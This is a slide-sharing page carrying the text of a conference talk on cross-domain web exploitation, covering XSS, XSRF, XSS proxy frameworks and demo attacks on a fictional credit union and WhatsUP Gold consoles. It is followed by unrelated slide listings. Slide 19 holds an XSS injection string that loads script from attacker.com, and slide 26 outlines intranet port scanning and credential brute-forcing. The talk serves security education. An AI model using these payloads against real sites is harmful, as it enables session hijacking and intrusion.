kicking down the cross domain door
play

Kicking Down the Cross Domain Door Techniques for Cross Domain - PowerPoint PPT Presentation

Sep 23, 2023 •259 likes •580 views

Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube Tabbed Browsing Rich Content Mash-ups Cookies JSON Ajax Implication of Cross Domain Attacks Implication of Cross Domain Attacks

  1. Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube

  2. Tabbed Browsing Rich Content Mash-ups Cookies JSON Ajax Implication of Cross Domain Attacks

  3. Implication of Cross Domain Attacks

  4. Attack Foundations Cross Site Scripting (XSS) • I njected Client Code • Cookie Stealing • Browser Hijacking • Web Page Defacement • Hawtness

  5. XSS Example / Demo Attack Foundations

  6. Attack Foundations Cross Site Request Forgery (XSRF) • Applications Trust • Parameters, Cookie, I P Space… • Authenticated Examples • New Hawtness

  7. XSRF Example / Demo Attack Foundations

  8. Attack Foundations XSS meets XSRF • Using XSS and XSRF together! • XSSXSSRFSSX? • Both Have Strengths • Both Have Weaknesses • One Armed Boxers

  9. XSS Proxies and Frameworks XSS Proxy Fundamentals • Anton Rager – XSS Proxy • BeEf, XSS Shell, Backframe • < script> alert(‘xss’)< / script> • < script src = …/ proxy.js> • Dynamic JavaScript Payloads • Frames and Control Channels

  10. XSS Proxies and Frameworks XS-Sniper • Typical XSS Proxy • Rendering of HTML • Organization of Data • JavaScript Payloads Provided • Source Code Snippets

  11. XSS Proxies and Frameworks Dynamic JavaScript Payload for execute.js Captured incoming HTTP requests to the XS-Sniper Proxy

  12. Dynamic JavaScript Payload for external.js

  13. XSS Proxies and Frameworks

  14. The Attack – The Initial XSS MyPercent20.com • Popular Social Networking/ Blogging Site • User Base of Tens of Thousands of Users • Allows Uploading of HTML and Other Content

  15. The Attack – BigCreditUnion.com BigCreditUnion.com • Typical Online Banking Website • Fictional Credit Union • Built-in Vulnerabilities for Demo

  16. BigCreditUnion Attacker MyPercent20 The Attack – BigCreditUnion.com I nternet The Victim

  17. The Attack – BigCreditUnion.com Assumptions • The victim has access to the I nternet • BigCreditUnion.com has an XSS exposure • The victim is using I E or Firefox

  18. The Attack – BigCreditUnion.com Steps to Exploitation • Target Reconnaissance • I nitial XSS • Jumping to BigCreditUnion • Authenticated Attacks • Unauthenticated Attacks

  19. parent.myFrame3.location.href= 'htt p://www.bigcreditunion.com/login.a sp?acctnum= "> < /td> < script%20sr c= http://www.attacker.com/test/ex ternal-spot.js?> < /script> < td> '; http://www.attacker.com/test/external-spot.js?test123 http://www.attacker.com/test/noresponse.js?test123

  20. The Attack – BigCreditUnion.com DEMO

  21. The Attack – WhatsUP Gold 2006 WhatsUP Gold 2006 • Made by I pswitch • Has Known XSS Vulnerabilities • Found on Corporate I ntranets • Not Limited to WhatsUP Gold • “Protected by Firewalls!”

  22. The Attack – WhatsUP Gold 2006

  23. The Attack – WhatsUP Gold 2006

  24. MyPercent20 Attacker The Attack – WhatsUP Gold 2006 I nternet The WhatsUP Victim Gold

  25. The Attack – WhatsUP Gold 2006 Assumptions • The management console is only available via the I ntranet • The victim will NOT be logged into the management console • The victim does NOT have a WhatsUP account • The victim is using Firefox (Possible with I E) • No unauthenticated XSS vulnerabilities

  26. The Attack – WhatsUP Gold 2006 Steps to Exploitation • Vulnerability Research • Target Reconnaissance • I nitial XSS • Port scanning and Fingerprinting • Brute Forcing Credentials • XSS follow-up • Driving I nteraction

  27. The Attack – WhatsUP Gold 2006 Creds List

  28. NOT LI MI TED TO WhatsUP Gold! The Attack – WhatsUP Gold 2006

  29. The Attack – WhatsUP Gold 2006 DEMO

  30. One More Time… This time in Slow motion WTF?

  31. Questions and Thanks… PEOPLE I ’ve MET PEOPLE I haven’t MET Danya Nitesh Dhanjani Jeremiah Grossman Rajat Swarup RSnake Sriram Anton Rager Mike Crabtree SPI Dynamics Old PAC-CERT Crew Black Hat Ed Souza Houston & New York Advanced Security Centers!

Recommend

BBJFC Presentation 3 Kicking Development Presented by: Joshua Bourke AFL Kicking Kicking

BBJFC Presentation 3 Kicking Development Presented by: Joshua Bourke AFL Kicking Kicking

BBJFC Presentation 3 Kicking Development Presented by: Joshua Bourke AFL Kicking Kicking Kicking, what should we coach? Lots of different ways to do it effectively Dont make every player kick the same 2 focus points????? Ball

274 views • 8 slides
CoNet: Collaborative Cross Networks for Cross-Domain Recommendation Guangneng Hu*, Yu Zhang, and

CoNet: Collaborative Cross Networks for Cross-Domain Recommendation Guangneng Hu*, Yu Zhang, and

CoNet: Collaborative Cross Networks for Cross-Domain Recommendation Guangneng Hu*, Yu Zhang, and Qiang Yang CIKM 2018 Oct 22-26 (Mo-Fr), Turin, Italy 1 Recommendations Are Ubiquitous: Products, Medias, Entertainment Amazon 300

277 views • 27 slides
Cross-Domain Learning-to-rank with SVM Erheng Zhong 1 1 Department of Computer Science and

Cross-Domain Learning-to-rank with SVM Erheng Zhong 1 1 Department of Computer Science and

Preliminary Cross-domain Learning-to-Rank Summary Cross-Domain Learning-to-rank with SVM Erheng Zhong 1 1 Department of Computer Science and Technology, HKUST COMP621U Presentation, 04/07/2011 Erheng Zhong Cross-Domain Learning-to-rank

620 views • 40 slides
Domain adaptation model for retinopathy detection from cross-domain OCT images Jing Wang 1;2 ,

Domain adaptation model for retinopathy detection from cross-domain OCT images Jing Wang 1;2 ,

Domain adaptation model for retinopathy detection from cross-domain OCT images Jing Wang 1;2 , Yiwei Chen 2 , Wanyue Li1; 2 , Wen Kong 1;2 , Yi He 2 , Chuihui Jiang *3 , Guohua Shi *2;4 1 University of Science and technology of China, Hefei 230026,

348 views • 9 slides
Cross-Layer and Cross-Domain QoS Signalling Using BGP 8th Wrzburg Workshop on IP: Joint

Cross-Layer and Cross-Domain QoS Signalling Using BGP 8th Wrzburg Workshop on IP: Joint

Cross-Layer and Cross-Domain QoS Signalling Using BGP 8th Wrzburg Workshop on IP: Joint EuroNF, ITC, and ITG Workshop on &quot;Visions of Future Generation Networks&quot; (EuroView2008) Thomas Martin Knoll Chemnitz University of Technology

101 views • 7 slides
IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door

IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door

IMS Single Door Enclosures IMS Two Door Enclosures IMS Single Door with Slave Door Disconnect IMS Two Door with Slave Door Disconnect Plinth Bases with Black Textured Finish Galvanized Sub-Panels Galvanized Filler Plates

302 views • 29 slides
Requirements for Policies in Cross-Domain Service

Requirements for Policies in Cross-Domain Service

Requirements for Policies in Cross-Domain Service Composi8on Ulrich Pinsdorf, Microso&gt; Jan Schallaboeck, ULD Stuart Short, SAP

361 views • 7 slides
The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an

The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an

The Invisible Door Keeper Q-Door is an innovative door sensor. In Armed Mode setting, it sends an alarm whenever a door or a window is opened. Additionally, it detects change in humidity , temperature and light and visualizes them on the online

479 views • 11 slides
Cross refferencing ethics Social virology demogra phy mathem atics Dogmas Quote 1

Cross refferencing ethics Social virology demogra phy mathem atics Dogmas Quote 1

Cross refferencing ethics Social virology demogra phy mathem atics Dogmas Quote 1 Geleerden in die tijd dat de ziekte door de lucht verspreid zou worden. Quote 2 Door het dragen van het masker zouden de kwade luchten

929 views • 44 slides
The Cross- -domain Information domain Information The Cross Exchange Framework (CIEF) Exchange

The Cross- -domain Information domain Information The Cross Exchange Framework (CIEF) Exchange

The Cross- -domain Information domain Information The Cross Exchange Framework (CIEF) Exchange Framework (CIEF) 20 May 2008 20 May 2008 Paul Shaw, SPAWARSYSCOM Paul Shaw, SPAWARSYSCOM Dr. David J. Roberts, iBASEt, Inc. Dr. David J.

856 views • 59 slides
A Hierarchical Framework for Cross Domain MapReduce Execution Yuan Luo 1 , Zhenhua Guo 1 ,

A Hierarchical Framework for Cross Domain MapReduce Execution Yuan Luo 1 , Zhenhua Guo 1 ,

A Hierarchical Framework for Cross Domain MapReduce Execution Yuan Luo 1 , Zhenhua Guo 1 , Yiming Sun 1 , Beth Plale 1 , Judy Qiu 1 , Wilfred W. Li 2 1 School of Informatics and Computing, Indiana University 2 San Diego Supercomputer Center,

356 views • 20 slides
Identifying Transferable Information Across Domains for Cross-domain Sentiment Classification

Identifying Transferable Information Across Domains for Cross-domain Sentiment Classification

Identifying Transferable Information Across Domains for Cross-domain Sentiment Classification Authors: Raksha Sharma, Pushpak Bhattacharyya, Sandipan Dandapat and Himanshu Sharad Bhatt Affiliation: IIT Bombay &amp; Xerox Research Center of

125 views • 10 slides
Towards a Reference Architecture for Service- Oriented Cross Domain Security Infrastructures Wen

Towards a Reference Architecture for Service- Oriented Cross Domain Security Infrastructures Wen

Towards a Reference Architecture for Service- Oriented Cross Domain Security Infrastructures Wen Zhu Dr. Lowell Vizenor Dr. Avinash Srinivasan 7 th International Conference on Internet and Distributed Computing Systems Agenda Background

128 views • 12 slides
Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door

Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door

Motivation Illustrative Example: ATT with One-Sided Noncompliance Application: JTPA Fr ont-door Versus Back-door Adjustment with Unmeasured Confounding: Bias Formulas for Front-door and Hybrid Adjustments 1 Adam Glynn and Konstantin Kashin

928 views • 53 slides
High Robustness Cross Domain Solutions Tiger Team John Mildner Jennifer Guild Layered

High Robustness Cross Domain Solutions Tiger Team John Mildner Jennifer Guild Layered

High Robustness Cross Domain Solutions Tiger Team John Mildner Jennifer Guild Layered Assurance Workshop - 2011 Purpose 2 Provide an overview of the High Robustness Cross Domain Solutions Tiger Team (HR CDS TT) Provide status on support to

465 views • 14 slides
Cross-Domain Recommendations via Segmented Models Shaghayegh Sahebi (Sherry) *,

Cross-Domain Recommendations via Segmented Models Shaghayegh Sahebi (Sherry) *,

Cross-Domain Recommendations via Segmented Models Shaghayegh Sahebi (Sherry) *, Trevor Walker + * Intelligent Systems Program, University of Pi&gt;sburgh + Linkedin

796 views • 33 slides
Slides on cross-domain call and Remote Procedure Call (RPC)

Slides on cross-domain call and Remote Procedure Call (RPC)

Slides on cross-domain call and Remote Procedure Call (RPC) This classic paper is a good example of a microbenchmarking study. It also explains the RPC abstraction and serves as a case study of the

477 views • 44 slides
On the limits of cross-domain generalization in automated X-ray prediction Joseph Paul Cohen 12 ,

On the limits of cross-domain generalization in automated X-ray prediction Joseph Paul Cohen 12 ,

On the limits of cross-domain generalization in automated X-ray prediction Joseph Paul Cohen 12 , Mohammad Hashir 12 , Rupert Brooks 3 , and Hadrien Bertrand 1 1 Mila, Quebec AI Institute 2 University of Montreal 3 Nuance Communications

449 views • 13 slides
Using Wikipedia for Co-clustering Based Cross-domain Text Classification Pu Wang and Carlotta

Using Wikipedia for Co-clustering Based Cross-domain Text Classification Pu Wang and Carlotta

Using Wikipedia for Co-clustering Based Cross-domain Text Classification Pu Wang and Carlotta Domeniconi George Mason University Jian Hu Microsoft Research Asia ICDM Pisa, December 16, 2008 Motivation Labeled data are seldom

467 views • 13 slides
Building International Co-Operation. Strategy for Coordination of Cross Domain Activities &amp;

Building International Co-Operation. Strategy for Coordination of Cross Domain Activities &amp;

Building International Co-Operation. Strategy for Coordination of Cross Domain Activities &amp; Multi-Lateral Approach in International Cooperation. BIC/DIMACS/A4Cloud/CSA International Workshop on Trustworthiness, Accountability &amp; Forensics

857 views • 44 slides
United States Court of Appeals for the Federal Circuit 00-1526, -1527, -1551 DOOR-MASTER

United States Court of Appeals for the Federal Circuit 00-1526, -1527, -1551 DOOR-MASTER

Door-Master Corp. v. Yorketown http://www.ll.georgetown.edu/Fed-Ct/Circuit/fed/opinions/00-1526.html United States Court of Appeals for the Federal Circuit 00-1526, -1527, -1551 DOOR-MASTER CORPORATION, Plaintiff-Cross Appellant, v.

574 views • 10 slides
Image Translation by Latent Union of Subspaces for Cross-Domain Plaque Detection Yingying Zhu 1 ,

Image Translation by Latent Union of Subspaces for Cross-Domain Plaque Detection Yingying Zhu 1 ,

Na Natio ional I l Instit itutes o of H Healt lth Clinical Ce Cl Center Image Translation by Latent Union of Subspaces for Cross-Domain Plaque Detection Yingying Zhu 1 , Daniel C. Delton 1 , Sungwon Lee 1 , Perry J. Pickhardt 2 , Ronald

401 views • 7 slides
Improving Cross-database Face Presentation Attack Detection via Adversarial Domain Adaptation

Improving Cross-database Face Presentation Attack Detection via Adversarial Domain Adaptation

Improving Cross-database Face Presentation Attack Detection via Adversarial Domain Adaptation Guoqing Wang 1,3 , Hu Han , 1,2 , Shiguang Shan 1,2,3,4 , and Xilin Chen 1,3 1 Key Laboratory of Intelligent Information Processing of Chinese Academy

130 views • 8 slides
A Generic Semantic-based Framework for Cross-domain Recommendation Ignacio Fernndez-Tobas 1 ,

A Generic Semantic-based Framework for Cross-domain Recommendation Ignacio Fernndez-Tobas 1 ,

A Generic Semantic-based Framework for Cross-domain Recommendation Ignacio Fernndez-Tobas 1 , Marius Kaminskas 2 , Ivn Cantador 1 , Francesco Ricci 2 1 Escuela Politcnica Superior, Universidad Autnoma de Madrid, Spain

877 views • 39 slides

More recommend